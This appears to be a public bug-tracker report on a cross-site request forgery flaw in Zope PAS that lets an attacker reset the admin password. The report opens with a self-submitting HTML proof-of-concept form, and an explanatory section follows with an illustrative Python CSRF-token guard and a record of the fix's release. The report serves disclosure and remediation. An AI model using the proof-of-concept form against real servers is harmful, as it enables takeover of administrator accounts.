userManager manage_updateUserPassword csrf

Bug #1079204 reported by Thomas
Affects: Zope PAS
Importance: Undecided
Assigned to: Tres Seaver

Bug Description

The following HTML allows the admin password to be reset:

<html>
  <body>
<form action="https://SERVER/acl_users/userManager/manage_updateUserPassword" method="post" name="form">
 user_id : <input value="admin" name="user_id">
  <br>
  password: <input value="zenoss26" name="password">
  <br>
  confirm :<input value="zenoss26" name="confirm">
  <br>
 <input type="submit">
</form>
<script>
document.forms["form"].submit();
</script>
  </body>
</html>
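The report above shows the classic cross-site request forgery shape: an authenticated admin's browser sends the cookies, the handler trusts the POST body, and nothing proves the request originated from the site's own form. The fix is to require a secret, per-session token that a third-party page cannot read and to reject any request that lacks it. The block below is an illustrative Python model of such a guard written for this page; it is not PluggableAuthService's own implementation. The session and form are plain dicts, the user store is a dict, and the `_csrf_token` field name is an assumption.

```python
"""Illustrative CSRF guard for a password-change handler.

Example code written for this page, not PluggableAuthService's own code.
Session, form and user store are stand-in dicts; `_csrf_token` is an
assumed field name.
"""
import hmac
import secrets


class CSRFError(Exception):
    """Raised when a state-changing request carries no valid CSRF token."""


def issue_csrf_token(session):
    """Create (or reuse) an unguessable token bound to the user's session.

    The site's own form embeds this token as a hidden field. A page on
    another origin can make the browser send the session cookie, but it
    cannot read the token, so it cannot forge a request that carries it.
    """
    token = session.get("_csrf_token")
    if token is None:
        token = secrets.token_hex(32)
        session["_csrf_token"] = token
    return token


def check_csrf(session, form):
    """Reject the request unless the submitted token matches the session's."""
    expected = session.get("_csrf_token")
    supplied = form.get("_csrf_token")
    if not expected or not isinstance(supplied, str):
        raise CSRFError("missing CSRF token")
    # Constant-time comparison so the token cannot be guessed byte by byte.
    if not hmac.compare_digest(expected, supplied):
        raise CSRFError("CSRF token mismatch")


def manage_updateUserPassword(session, form, users):
    """Hardened handler taking the same user_id/password/confirm fields as
    the vulnerable one, plus the required _csrf_token. Returns the user_id
    whose password was changed."""
    check_csrf(session, form)  # must run before any state change
    user_id = form.get("user_id")
    password = form.get("password")
    confirm = form.get("confirm")
    if user_id not in users:
        raise KeyError("no such user: %r" % user_id)
    if not password or password != confirm:
        raise ValueError("password and confirm do not match")
    users[user_id] = password  # stand-in for hashed storage in a real system
    return user_id


def demo():
    """Replay the report's forged POST, then a genuine one, and return
    (forged_blocked, admin_password_after)."""
    users = {"admin": "original-secret"}
    session = {}  # the admin's authenticated session
    token = issue_csrf_token(session)

    # 1. The attacker's auto-submitted form from the report: no token.
    forged = {"user_id": "admin", "password": "zenoss26", "confirm": "zenoss26"}
    try:
        manage_updateUserPassword(session, forged, users)
        forged_blocked = False
    except CSRFError:
        forged_blocked = True

    # 2. The same fields submitted from the site's own form with its token.
    genuine = dict(forged, _csrf_token=token)
    manage_updateUserPassword(session, genuine, users)
    return forged_blocked, users["admin"]


if __name__ == "__main__":
    print(demo())
```

The token must be checked before the password is touched and must be compared with a constant-time function; a SameSite cookie attribute is a useful second layer but does not replace the token, since older browsers ignore it.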

Tres Seaver (tseaver)
Changed in zope-pas:
assignee: nobody → Tres Seaver (tseaver)
status: New → Confirmed
Tres Seaver (tseaver) wrote :
Changed in zope-pas:
status: Confirmed → Fix Committed
Tres Seaver (tseaver)
Changed in zope-pas:
status: Fix Committed → Fix Released
information type: Private Security → Public Security